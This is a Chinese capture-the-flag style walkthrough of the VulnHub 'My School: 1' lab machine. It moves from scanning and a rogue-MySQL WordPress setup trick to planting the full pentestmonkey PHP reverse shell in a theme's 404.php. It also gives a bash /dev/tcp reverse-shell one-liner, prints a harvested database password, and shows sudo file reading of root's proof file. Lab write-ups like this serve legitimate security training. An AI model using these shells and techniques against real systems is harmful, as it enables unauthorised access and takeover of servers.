My School: 1靶场攻略
My School: 1 ~ VulnHub下载
靶机渗透练习20-My School_mysql (unauthorized)-CSDN博客攻略
1.前置知识
网络地址:主机位全 0 → 192.168.100.0(代表整个网段) 广播地址:主机位全 1 → 192.168.100.255(发给网段所有设备) 192.168.100.1 路由器 可用主机 IP 范围 192.168.100.1 ~ 192.168.100.254 可用数量:256 - 2 = 254 台设备 IP:192 . 168 . 100 . 140 二进制分段: 11000000(8 位) . 10101000(8 位) . 01100100(8 位) . 10001100(8 位) 连在一起一长串就是 32 个 0 和 1,这就是完整 IP 二进制。 2 的 6 次方:2^6 = 2×2×2×2×2×2 = 64 2 的 7 次方:2^7 = 2×2×2×2×2×2×2 = 1282.主机发现
arp-scan -I eth0 192.168.100.0/24 nmap -sn 192.168.100.0/24 netdiscover -i eth0 -r 192.168.100.0/24 masscan 192.168.100.140 -p 803.端口扫描
nmap -sS -Pn --min-rate=10000 -sV -O 192.168.100.140 -p-22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
33060/tcp open mysqlx MySQL X protocol listener
22 端口分析
一般只能暴力破解,暂时没有合适的字典
80 端口分析
访问 80 端口
扫描一下80端口目录
dirsearch -u http://192.168.100.140响应200的有好几个,挨个打开一下
http://192.168.100.140/admin/login.php
可以看到是 CMS Made Simple
kali中searchsploit CMS Made Simple
搜索kali本地漏洞库:
发现有好多可利用的,回头再去看看页面能否得到其他信息
可知CMS的 版本是2.2.14,再精确搜索一下
searchsploit CMS Made Simple 2.2.14
都有Authenticated,说明都需要授权才可以使用
8080端口分析
打开发现这是wordpress的安装界面
kali中开启mysql
在 kali 本地开启 mysql 服务,然后先登陆一下看看账户和密码,一般是 root/root
service mysql start
mysql -u root -p
默认情况下,数据库服务监听的是本地 IP,想要其他 IP 访问需要修改配置文件改为0.0.0.0
修改配置文件
vim /etc/mysql/mariadb.conf.d/50-server.cnf
改完之后重启一下mysql
service mysql start 启动 systemctl restart mysql重启 systemctl status mysql检查状态 vim /etc/mysql/mariadb.conf.d/50-server.cnf修改配置接下来登录mysql,创建wordpress 数据库并添加数据
create database wordpress; create user 'wpuser'@'192.168.100.140' identified by 'wppass';账号密码 grant all on wordpress.* to 'wpuser'@'192.168.100.140' with grant option;添加增删改查 flush privileges;刷新 show databases;靶机上连接数据库主机(kali)
成功登录对应靶机wordpress后台
进入该区域放入我们的木马
<?php // php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php // Copyright (C) 2007 pentestmonkey@pentestmonkey.net set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.100.128'; $port = 6666; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>404.php 是网站自带页面,访问不存在的路径时,服务器会自动执行这个文件;
那么我们访问一个网站不存在的目录
http://192.168.100.140:8080/aaaaaaaaa
这个老是反弹不过来 换一个方法吧 使用一句话木马
2020 twentytwenty
http://192.168.100.140:8080/wp-content/themes/twentytwenty/404.php成功拿到shell 反弹shell到kali
bash -c '/bin/sh -i >& /dev/tcp/192.168.100.128/9001 0>&1'python3 -c 'import pty; pty.spawn("/bin/bash")'不用想又是一个虚假的flag
切换用户
查看网站目录:/var/www/html,发现 cms 中的一个密码:
<?php # CMS Made Simple Configuration File # Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference # $config['dbms'] = 'mysqli'; $config['db_hostname'] = 'localhost'; $config['db_username'] = 'root'; $config['db_password'] = 'SW)#$of4-9056d'; $config['db_name'] = 'cmsms_db'; $config['db_prefix'] = 'cms_'; $config['timezone'] = 'America/New_York';权限提升
这个命令支持cat和 ls,有 sudo 权限说明可以任意文件读取
执行命令
cat /root/proof.txt